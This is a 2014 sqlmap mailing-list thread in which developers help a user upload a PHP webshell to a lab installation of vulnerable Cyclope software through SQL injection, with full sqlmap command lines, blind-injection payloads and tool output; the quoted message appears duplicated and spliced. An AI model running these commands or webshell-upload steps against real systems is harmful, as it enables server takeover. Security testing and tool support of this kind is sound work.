Hi Brian, We do use INTO DUMPFILE to write files on the file system when the database is MySQL. This works if stacked queries (nested queries) SQLi technique is supported, which is not the case against a PHP application with MySQL back-end. When stacked queries is not possible and the back-end is MySQL, sqlmap fall-backs to UNION SQLi technique with the same INTO DUMPFILE clause to write the file in the file system.
When you instruct sqlmap to takeover the OS and no stacked queries are supported, then if the back-end is MySQL again, it will try to upload a web shell to a writable folder within the web server's document root directory - this is achieved with the technique explained above or, better, with the LINES TERMINATED BY used to terminate the original SQL statement with the file stager injected by sqlmap dumped to the file on the file system and used to upload the web shell. I have checked the Metasploit exploit source code, line 150, and I see it uses the boolean-based SQL injection technique to upload the file - that is not yet supported by sqlmap. We will look into implementing this, I've created a ticket for that, https://github.com/sqlmapproject/sqlmap/issues/647. According to the exploit, the request method is POST so your syntax should reflect that: -u "http://172.16.71.138:7879/index.php"; --data="act=auth-login&pag=login&username=admin&password=admin" - not necessarily GET and POST verbs are interchangeable by the application. Also, I notice you provide your own web shell - you can let sqlmap use its own with --os-cmd, --os-shell or --os-pwn. When prompted with a question about the language, stick to PHP, then sqlmap asks what is the writable directory, select 2 and provide your application one, "C:/Progra~1/Cyclope/ni4zlja/" and let sqlmap do its thing. All in all, can you please relaunch sqlmap (make sure you run git pull first to sync to the GitHub repository) with the following syntax: Bernardo On 21 March 2014 09:42, Miroslav Stampar <miroslav.stam...@gmail.com> wrote: > Hi. > > --file-write requires union or stacked techniques to be available. In case > of --os-shell we also use INTO OUTFILE technique which is pretty dirty (in > most of cases you can expect original results appearing in the first couple > of lines). Option --file-write in our case should produce a "clean" file > > Kind regards, > Miroslav Stampar > > > On Fri, Mar 21, 2014 at 4:18 AM, Brian Olson <br...@hurrikane.net> wrote: >> >> Hello Everyone, >> >> I'm attempting to use sqlmap to exploit a local installation of some >> software. I know it's vulnerable because it's on exploit-db & metasploit >> pops it every time (http://www.exploit-db.com/exploits/20501/). I've had >> limited success with sqlmap, but I'm at the final stage now where I'm trying >> to use the sqli's I've found to upload a webshell via sqlmap. No >> dice....I'm getting an error stating "[ERROR] none of the SQL injection >> techniques detected can be used to write files to the underlying file system >> of the back-end MySQL server." Other than the obvious, I'm not sure what >> this means because --os-shell and --os-cmd upload a file and execute just >> fine. Does --file-write need something special? Here's the output: >> >> root@kali:/usr/share/sqlmap# sqlmap -u >> "http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin"; >> -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write >> /usr/share/webshells/php/simple-backdoor.php --file-dest >> progra~1/cyclope/ni4zlja=/backdoor.php -v3 >> >> ... >> [*] starting at 23:13:08 >> >> [23:13:08] [DEBUG] cleaning up configuration parameters >> [23:13:08] [DEBUG] setting the HTTP timeout >> [23:13:08] [DEBUG] setting the HTTP method to GET >> [23:13:08] [DEBUG] creating HTTP requests opener object >> [23:13:08] [DEBUG] forcing back-end DBMS to user defined value >> [23:13:08] [DEBUG] setting the write file functionality >> [23:13:08] [INFO] testing connection to the target URL >> [23:13:08] [DEBUG] declared web page charset 'utf-8' >> sqlmap identified the following injection points with a total of 0 HTTP(s) >> requests: >> --- >> Place: GET >> Parameter: username >> Type: boolean-based blind >> Title: AND boolean-based blind - WHERE or HAVING clause >> Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND >> 'yVaP'='yVaP&password=admin >> Vector: AND [INFERENCE] >> >> Type: AND/OR time-based blind >> Title: MySQL > 5.0.11 AND time-based blind >> Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND >> 'OHln'='OHln&password=admin >> Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) >> --- >> [23:13:08] [INFO] testing MySQL >> [23:13:08] [INFO] confirming MySQL >> [23:13:08] [INFO] the back-end DBMS is MySQL >> web server operating system: Windows >> web application technology: PHP 5.3.1, Apache 2.2.14 >> back-end DBMS: MySQL >= 5.0.0 >> [23:13:08] [INFO] fingerprinting the back-end DBMS operating system >> [23:13:08] [INFO] the back-end DBMS operating system is Windows >> [23:13:08] [ERROR] none of the SQL injection techniques detected can be >> used to write files to the underlying file system of the back-end MySQL >> server >> [23:13:08] [INFO] fetched data logged to text files under >> '/usr/share/sqlmap/output/172.16.71.138' >> >> [*] shutting down at 23:13:08 >> >> >> The results are the same when the cmdline is changed up for a POST >> version: >> >> root@kali:/usr/share/sqlm >> Hello Everyone, >> >> I'm attempting to use sqlmap to exploit a local installation of some >> software. I know it's vulnerable because it's on exploit-db & metasploit >> pops it every time (http://www.exploit-db.com/exploits/20501/). I've had >> limited success with sqlmap, but I'm at the final stage now where I'm trying >> to use the sqli's I've found to upload a webshell via sqlmap. No >> dice....I'm getting an error stating "[ERROR] none of the SQL injection >> techniques detected can be used to write files to the underlying file system >> of the back-end MySQL server." Other than the obvious, I'm not sure what >> this means because --os-shell and --os-cmd upload a file and execute just >> fine. Does --file-write need something special? Here's the output: >> >> root@kali:/usr/share/sqlmap# sqlmap -u >> "http://172.16.71.138:7879/index.php?act=auth-login&pag=login&username=admin&password=admin"; >> -p "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write >> /usr/share/webshells/php/simple-backdoor.php --file-dest >> progra~1/cyclope/ni4zlja=/backdoor.php -v3 >> >> ... >> [*] starting at 23:13:08 >> >> [23:13:08] [DEBUG] cleaning up configuration parameters >> [23:13:08] [DEBUG] setting the HTTP timeout >> [23:13:08] [DEBUG] setting the HTTP method to GET >> [23:13:08] [DEBUG] creating HTTP requests opener object >> [23:13:08] [DEBUG] forcing back-end DBMS to user defined value >> [23:13:08] [DEBUG] setting the write file functionality >> [23:13:08] [INFO] testing connection to the target URL >> [23:13:08] [DEBUG] declared web page charset 'utf-8' >> sqlmap identified the following injection points with a total of 0 HTTP(s) >> requests: >> --- >> Place: GET >> Parameter: username >> Type: boolean-based blind >> Title: AND boolean-based blind - WHERE or HAVING clause >> Payload: act=auth-login&pag=login&username=admin' AND 2011=2011 AND >> 'yVaP'='yVaP&password=admin >> Vector: AND [INFERENCE] >> >> Type: AND/OR time-based blind >> Title: MySQL > 5.0.11 AND time-based blind >> Payload: act=auth-login&pag=login&username=admin' AND SLEEP(5) AND >> 'OHln'='OHln&password=admin >> Vector: AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM]) >> --- >> [23:13:08] [INFO] testing MySQL >> [23:13:08] [INFO] confirming MySQL >> [23:13:08] [INFO] the back-end DBMS is MySQL >> web server operating system: Windows >> web application technology: PHP 5.3.1, Apache 2.2.14 >> back-end DBMS: MySQL >= 5.0.0 >> [23:13:08] [INFO] fingerprinting the back-end DBMS operating system >> [23:13:08] [INFO] the back-end DBMS operating system is Windows >> [23:13:08] [ERROR] none of the SQL injection techniques detected can be >> used to write files to the underlying file system of the back-end MySQL >> server >> [23:13:08] [INFO] fetched data logged to text files under >> '/usr/share/sqlmap/output/172.16.71.138' >> >> [*] shutting down at 23:13:08 >> >> >> The results are the same when the cmdline is changed up for a POST >> version: >> >> root@kali:/usr/share/sqlmap# sqlmap -u >> "http://172.16.71.138:7879/index.php"; >> --data='act=auth-login&pag=login&username=admin&password=admin' -p >> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write >> /usr/share/webshells/php/simple-backdoor.php --file-dest >> progra~1/cyclope/ni4zlja=/backdoor.php -v3 >> >> Any thoughts on what may be happening here would be much appreciated. >> >> Thanks, >> >> Brian >> ap# sqlmap -u "http://172.16.71.138:7879/index.php"; >> --data='act=auth-login&pag=login&username=admin&password=admin' -p >> "username" --threads=10 --dbms=mysql --level=6 --risk=3 --file-write >> /usr/share/webshells/php/simple-backdoor.php --file-dest >> progra~1/cyclope/ni4zlja=/backdoor.php -v3 >> >> Any thoughts on what may be happening here would be much appreciated. >> >> Thanks, >> >> Brian >> >> >> ------------------------------------------------------------------------------ >> Learn Graph Databases - Download FREE O'Reilly Book >> "Graph Databases" is the definitive new guide to graph databases and their >> applications. Written by three acclaimed leaders in the field, >> this first edition is now available. Download your free book today! >> http://p.sf.net/sfu/13534_NeoTech >> _______________________________________________ >> sqlmap-users mailing list >> sqlmap-users@lists.sourceforge.net >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> > > > > -- > Miroslav Stampar > http://about.me/stamparm > > ------------------------------------------------------------------------------ > Learn Graph Databases - Download FREE O'Reilly Book > "Graph Databases" is the definitive new guide to graph databases and their > applications. Written by three acclaimed leaders in the field, > this first edition is now available. Download your free book today! > http://p.sf.net/sfu/13534_NeoTech > _______________________________________________ > sqlmap-users mailing list > sqlmap-users@lists.sourceforge.net > https://lists.sourceforge.net/lists/listinfo/sqlmap-users > -- Bernardo Damele A. G. E-mail / Jabber: bernardo.damele (at) gmail.com Mobile: +447788962949 (UK 07788962949) ------------------------------------------------------------------------------ Learn Graph Databases - Download FREE O'Reilly Book "Graph Databases" is the definitive new guide to graph databases and their applications. Written by three acclaimed leaders in the field, this first edition is now available. Download your free book today! http://p.sf.net/sfu/13534_NeoTech _______________________________________________ sqlmap-users mailing list sqlmap-users@lists.sourceforge.net https://lists.sourceforge.net/lists/listinfo/sqlmap-users
